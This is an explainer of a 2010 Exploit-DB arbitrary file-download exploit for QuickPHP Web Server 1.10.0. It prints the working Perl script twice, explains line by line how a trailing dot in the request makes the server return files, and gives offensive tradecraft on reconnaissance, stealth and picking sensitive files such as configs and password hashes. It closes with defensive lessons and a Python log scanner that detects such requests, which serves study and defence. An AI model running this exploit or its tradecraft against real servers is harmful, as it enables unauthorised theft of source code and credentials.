QuickPHP Web Server 1.10.0 Remote File Download Exploit Explained

What this paper is
This paper details a vulnerability in QuickPHP Web Server version 1.10.0 that allows an attacker to download arbitrary files from the server, even if they do not have the necessary permissions. The exploit is presented as a Perl script that leverages this vulnerability to retrieve specified files.
Simple technical breakdown
The core of the vulnerability lies in how QuickPHP Web Server handles file requests. It appears to have a weakness in its request parsing or file access control mechanism. When a request is made for a file, the server doesn't properly validate the requested path or the user's permissions before serving the file. The exploit script capitalizes on this by constructing a URL that tricks the server into returning the content of any file specified by the attacker.
The exploit works by sending a GET request to the vulnerable server. The URL is crafted to include the target file name followed by a dot (.). This specific construction seems to trigger the vulnerability, causing the server to return the file's content instead of an error or a directory listing.
Complete code and payload walkthrough
The provided Perl script is designed to exploit the arbitrary file download vulnerability in QuickPHP Web Server 1.10.0.
#!/usr/bin/perl
use LWP::Simple;

if (@ARGV < 3) {
    print("\r\n");
    print("QuickPHP Web Server 1.10.0 Remote File Download Exploit\r\n");
    print("Discovered & Exploited by Pr0T3cT10n\r\n");
    print("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n");
    print("Usage: " .$0. " <host> <port> <file>\r\n");
    print("HOST - An host using QuickPHP Web Server\r\n");
    print("PORT - Port number\r\n");
    print("FILE - The file you want to get\r\n");
    print("Example: " .$0. " hostingserver.com 80 index.php\r\n\r\n");
    exit(1);
} else {
    print("QuickPHP Web Server 1.10.0 Remote File Download Exploit\r\n");
    print("Discovered & Exploited by Pr0T3cT10n\r\n");
    print("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\n");
    ($host, $port, $file) = @ARGV;
    $content = get("http://" .$host. ":" .$port. "/" .$file. ".");
    print("File Content:\r\n\r\n");
    print($content. "\r\n");
}

Let's break down the code:
- #!/usr/bin/perl: The shebang line, indicating that the script should be executed by the Perl interpreter.
- use LWP::Simple;: Imports the LWP::Simple module, which provides a simple interface for making HTTP requests. This module is what fetches content from the web server.
- if (@ARGV < 3): Checks whether fewer than three command-line arguments were supplied. @ARGV is the special Perl array that holds the arguments passed to the script; fewer than three means the user has not provided all of the required information (host, port, file).
- print(...): These lines print usage instructions and information about the exploit. exit(1);: Terminates the script with exit code 1, indicating an error (incorrect usage).
- else { ... }: This block executes when three or more command-line arguments were supplied, meaning the user has provided the required information. Its print(...) lines print introductory messages about the exploit.
- ($host, $port, $file) = @ARGV;: Assigns the first three command-line arguments to $host (the target server's hostname or IP address), $port (the target server's port number) and $file (the name of the file the attacker wants to download).
- $content = get("http://" .$host. ":" .$port. "/" .$file. ".");: The core of the exploit. get(...) from LWP::Simple performs an HTTP GET request to the specified URL and returns the content of the response. The URL concatenates "http://", the target host, the port, a forward slash, the target file name and, crucially, a trailing dot (.). This trailing dot is what triggers the vulnerability in QuickPHP Web Server. The retrieved content is stored in the $content variable.
- print("File Content:\r\n\r\n");: Prints a header indicating that the file content will follow. print($content. "\r\n");: Prints the actual content of the downloaded file, followed by a newline.
Payload/Shellcode Explanation:
There is no explicit shellcode or complex payload in this script. The "payload" is simply the crafted HTTP GET request that exploits the server's vulnerability to download a file. The script itself acts as the delivery mechanism for this request. The output of the script is the content of the downloaded file.
Code Fragment/Block -> Practical Purpose Mapping:
- #!/usr/bin/perl: Script interpreter declaration.
- use LWP::Simple;: Imports the HTTP request library.
- if (@ARGV < 3): Checks for sufficient command-line arguments.
- print("Usage: ..."): Displays the help message if arguments are insufficient.
- exit(1);: Exits the script on incorrect usage.
- ($host, $port, $file) = @ARGV;: Assigns command-line arguments to variables.
- get("http://" .$host. ":" .$port. "/" .$file. ".");: Constructs and sends the exploit URL to download the file.
- print($content. "\r\n");: Displays the downloaded file content.
Practical details for offensive operations teams
- Required Access Level: Network access to the target host and port where QuickPHP Web Server is running. No prior authentication is required as this is an unauthenticated remote vulnerability.
- Lab Preconditions:
- A target system running QuickPHP Web Server version 1.10.0.
- Network connectivity between the attacker's machine and the target.
- The target server must be accessible over the network.
- Tooling Assumptions:
- A system with Perl installed.
- The LWP::Simple Perl module must be installed (usually included with standard Perl distributions, but worth verifying).
- Basic network tools like ping or nmap might be useful for initial reconnaissance to confirm host availability and port status.
- Execution Pitfalls:
- Incorrect Version: The exploit is specific to version 1.10.0. If the target is running a different version, it will likely fail.
- Firewall/Network Restrictions: Network firewalls or Intrusion Prevention Systems (IPS) might block the HTTP request or detect the unusual URL pattern.
- Server Configuration: While the vulnerability is in the server software, specific server configurations (e.g., extreme access restrictions on the web server process itself) might prevent the download of certain sensitive files, even if the exploit technically works.
- File Not Found: If the specified file does not exist on the server, the get() function will likely return an HTTP error (e.g., 404 Not Found), and the script will print that error message as the "File Content."
- Large Files: Downloading very large files might consume significant bandwidth and time, and the script's output might become unwieldy.
- Encoding Issues: If the file path or content contains special characters that are not handled correctly by Perl or the web server, it could lead to unexpected results.
- Tradecraft Considerations:
- Reconnaissance: Before executing, confirm the target is running a web server and identify the specific version if possible. Tools like nmap with version detection scripts can be helpful.
- Stealth: The exploit itself is a simple HTTP GET request. The primary indicators would be network traffic to the target's web server port. The LWP::Simple module might not be as noisy as some other HTTP clients, but network monitoring can still detect the outbound request.
- File Selection: Carefully choose the files to download. Attempting to download known sensitive files (e.g., configuration files, password hashes, system executables) is a common objective.
- Post-Exploitation: The downloaded file content is printed to standard output. For automated collection, the output can be redirected to a file (perl exploit.pl target.com 80 config.ini > downloaded_config.ini).
Where this was used and when
- Context: This exploit targets a vulnerability in a web server software. Such vulnerabilities are typically exploited by attackers to gain unauthorized access to sensitive information hosted on web servers. This could be for data theft, reconnaissance, or as a stepping stone for further attacks.
- Approximate Years/Dates: The paper was published on December 30, 2010. Therefore, this exploit was likely developed and potentially used around that time. Vulnerabilities of this nature can remain unpatched for some time after discovery, so it's possible it was relevant for a period after its publication.
Defensive lessons for modern teams
- Software Patching and Updates: The most critical lesson is the importance of keeping web server software and all its components up-to-date. This vulnerability was specific to version 1.10.0, highlighting the need to patch to later, more secure versions.
- Input Validation: Web applications and servers must rigorously validate all user inputs, especially file paths and request parameters. The vulnerability here suggests a lack of proper sanitization or validation of the requested file path.
- Principle of Least Privilege: Web server processes should run with the minimum necessary privileges. Even if a vulnerability allows an attacker to request a file, the server process should not have permissions to read highly sensitive system files.
- Web Application Firewalls (WAFs): WAFs can be configured to detect and block requests with suspicious patterns, such as unusual file extensions or path traversals, which might include the trailing dot used in this exploit.
- File Access Control: Implement strict access controls on the file system to prevent unauthorized users or processes from reading sensitive files.
- Monitoring and Logging: Monitor web server logs for unusual access patterns, such as repeated requests for non-existent files or attempts to access sensitive directories.
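As an added defensive example (not part of the original paper or of QuickPHP itself), the following Python implements the request-path check that the input-validation, WAF and monitoring lessons above call for, and runs it over constructed Common Log Format access-log lines to flag trailing-dot requests of the kind this exploit sends. The IP addresses, timestamps and file names in the sample log are constructed for illustration; the same check could sit in front of a file-serving handler to reject such requests before any file is opened.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (Common Log Format); hosts, timestamps
# and file names are illustrative, not taken from the paper.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Dec/2010:10:00:01 +0200] "GET /index.php HTTP/1.1" 200 512
10.0.0.9 - - [30/Dec/2010:10:00:07 +0200] "GET /index.php. HTTP/1.1" 200 2048
10.0.0.9 - - [30/Dec/2010:10:00:09 +0200] "GET /config.inc.php. HTTP/1.1" 200 1337
10.0.0.5 - - [30/Dec/2010:10:00:12 +0200] "GET /images/logo.png HTTP/1.1" 200 9000
10.0.0.9 - - [30/Dec/2010:10:00:15 +0200] "GET /..%2f..%2fboot.ini HTTP/1.1" 404 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def suspicious_path(target: str) -> Optional[str]:
    """Return why a request target should be rejected, or None if it is clean."""
    # Decode first so encoded variants (%2e, %2f) cannot slip past the checks.
    path = unquote(urlsplit(target).path)
    segments = path.split("/")
    # The trailing dot is exactly the pattern the exploit above relies on.
    if segments[-1].endswith("."):
        return "trailing dot on file name"
    # Companion check any path validator needs, though not used by this exploit.
    if ".." in segments:
        return "path traversal"
    return None


def scan_log(text: str) -> List[Tuple[str, str, int, str]]:
    """Run suspicious_path() over each line; return (ip, target, status, reason)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = suspicious_path(m["target"])
        if reason:
            # A 200 on a flagged request means the file was actually served.
            findings.append((m["ip"], m["target"], int(m["status"]), reason))
    return findings


if __name__ == "__main__":
    for ip, target, status, reason in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {target}  <- {reason}")
```

Flagged requests that received a 200 are the ones to triage first, since they indicate the server served the file rather than refusing the malformed name.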
ASCII visual (if applicable)
This exploit is a direct client-server interaction for file retrieval. An ASCII visual can represent the flow of the request and response.
+-----------------+         HTTP GET Request         +---------------------+
| Attacker's Host | -------------------------------> | QuickPHP Web Server |
| (Perl Script)   |   (e.g., GET /sensitive.conf.)   |      (v1.10.0)      |
+-----------------+                                  +----------+----------+
                                                                |
                                                                | HTTP Response (File Content)
                                                                v
                                                       +-----------------+
                                                       | Attacker's Host |
                                                       | (Perl Script)   |
                                                       +-----------------+

Source references
- PAPER ID: 15868
- PAPER TITLE: QuickPHP Web Server - Arbitrary '.php' File Download
- AUTHOR: Yakir Wizman
- PUBLISHED: 2010-12-30
- KEYWORDS: Windows, remote
- PAPER URL: https://www.exploit-db.com/papers/15868
- RAW URL: https://www.exploit-db.com/raw/15868
- Software Link (from paper): http://www.zachsaw.co.cc/downloads/quickphp_webserver.zip
Original Exploit-DB Content (Verbatim)
# _ ____ __ __ ___
# (_)____ _ __/ __ \/ /_____ ____/ / _/_/ |
# / // __ \ | / / / / / //_/ _ \/ __ / / / / /
# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/
# Live by the byte |_/_/
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
# QuickPHP Web Server is vulnerable to a Remote File Download attack, the following code will exploit the bug.
# The vulnerability allows an unprivileged attacker to download files to which he has no permissions.
# -----------------------------------
# Vulnerability Title: QuickPHP Web Server 1.10.0 Remote File Download Exploit
# Date: 30/12/2010
# Author: Pr0T3cT10n
# Software Link: http://www.zachsaw.co.cc/downloads/quickphp_webserver.zip
# Affected Version: 1.10.0
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
###
#!/usr/bin/perl
use LWP::Simple;
if (@ARGV < 3) {
print("\r\n");
print("QuickPHP Web Server 1.10.0 Remote File Download Exploit\r\n");
print("Discovered & Exploited by Pr0T3cT10n\r\n");
print("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n");
print("Usage: " .$0. " <host> <port> <file>\r\n");
print("HOST - An host using QuickPHP Web Server\r\n");
print("PORT - Port number\r\n");
print("FILE - The file you want to get\r\n");
print("Example: " .$0. " hostingserver.com 80 index.php\r\n\r\n");
exit(1);
} else {
print("QuickPHP Web Server 1.10.0 Remote File Download Exploit\r\n");
print("Discovered & Exploited by Pr0T3cT10n\r\n");
print("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\n");
($host, $port, $file) = @ARGV;
$content = get("http://" .$host. ":" .$port. "/" .$file. ".");
print("File Content:\r\n\r\n");
print($content. "\r\n");
}